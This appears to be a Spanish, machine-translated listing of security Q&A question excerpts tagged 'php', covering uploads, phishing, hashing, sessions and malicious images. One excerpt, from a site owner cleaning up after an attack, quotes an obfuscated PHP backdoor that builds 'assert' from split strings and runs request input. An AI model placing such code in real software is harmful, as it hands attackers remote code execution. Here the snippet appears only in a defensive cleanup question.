Preguntas con etiqueta 'php'

preguntas con etiqueta
4
respuestas

¿Cuáles son las amenazas de seguridad de las cargas de archivos zip y qué medidas preventivas deben tomarse?

Tenemos una aplicación Drupal desarrollada para compartir archivos. Estamos permitiendo que los archivos zip sean cargados por usuarios registrados en el departamento. Estamos utilizando el sistema de archivos privado Drupal (fuera de webr...
hecha 04.04.2013 - 09:38
6
respuestas

¿Hay alguna forma de descargar un archivo PHP sin que se ejecute?

Hace poco recibí un correo de phishing de una calidad inusualmente mala; "Por favor, inicie sesión inmediatamente en el siguiente enlace, ya que somos su banco, ya sabe" -ish. El enlace apunta a una URL poco convincente con .php al final....
hecha 03.09.2015 - 10:51
5
respuestas

¿Es posible encontrar un desbordamiento de búfer en WordPress?

Tuve una conversación interesante con un pentester que me dijo que había encontrado un desbordamiento de búfer en Wordpress. La persona en cuestión estaba realmente convencida de que esto era cierto. El cliente se muestra un poco escéptico acerc...
hecha 08.02.2018 - 10:38
3
respuestas

¿Qué tan seguros son los hashes sha256 + salt para el almacenamiento de contraseñas [duplicado]

Comencé a leer sobre el hashing de contraseñas recientemente en varios sitios como esta página en crackstation y otros, y para qué He entendido, debería evitar el uso de algoritmos de hashing como md5 y sha1, ya que están desactualizados y,...
hecha 25.05.2015 - 20:23
3
respuestas

malware PHP en el servidor, pero incapaz de identificar el código malicioso

Soy nuevo en esta comunidad, así que perdóneme si mi pregunta es estúpida. Descubrí que mi servidor fue hackeado y encontré varios archivos PHP en él. No he sido perezoso y he intentado todo lo posible para detectar lo que realmente estaba...
hecha 16.09.2016 - 17:50
2
respuestas

Explosiones de caracteres multibyte - PHP / MySQL

¿Alguien podría, por favor, indicarme un enlace con información sobre las vulnerabilidades de caracteres multibyte para MySQL? Un amigo me llamó la atención, pero no he podido encontrar mucha información en Internet.     
hecha 20.12.2011 - 07:08
2
respuestas

¿Qué hace este código PHP sospechoso? [duplicar]

Estoy limpiando un sitio web después de un ataque que resultó en la carga de muchos PHP shells. He encontrado y eliminado el siguiente código: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } ¿Podría decir...
hecha 13.01.2017 - 00:06
9
respuestas

¿Por qué la gente dice que PHP es intrínsecamente inseguro?

He oído decir que PHP es intrínsecamente inseguro. ¿Es esto cierto? ¿Por qué?     
hecha 21.11.2010 - 16:54
3
respuestas

Creando sesiones seguras de PHP

Ya he creado y refinado los sistemas de registro e inicio de sesión. Sin embargo, estoy convencido de que la parte difícil se produce cuando se crea una sesión. Por lo que sé, esto se debe tanto al secuestro como a la fijación. Que con toda hone...
hecha 13.11.2012 - 02:10
3
respuestas

¿Es posible ejecutar un script php en un archivo de imagen? [duplicar]

Tengo una imagen subir el sitio web de php. Los usuarios pueden subir imágenes a mi sitio web. Un usuario afirma que puede piratear mi sitio web utilizando una imagen cargada. Abrí todas las imágenes que subió a mi servidor con el bloc de n...
hecha 21.03.2013 - 08:16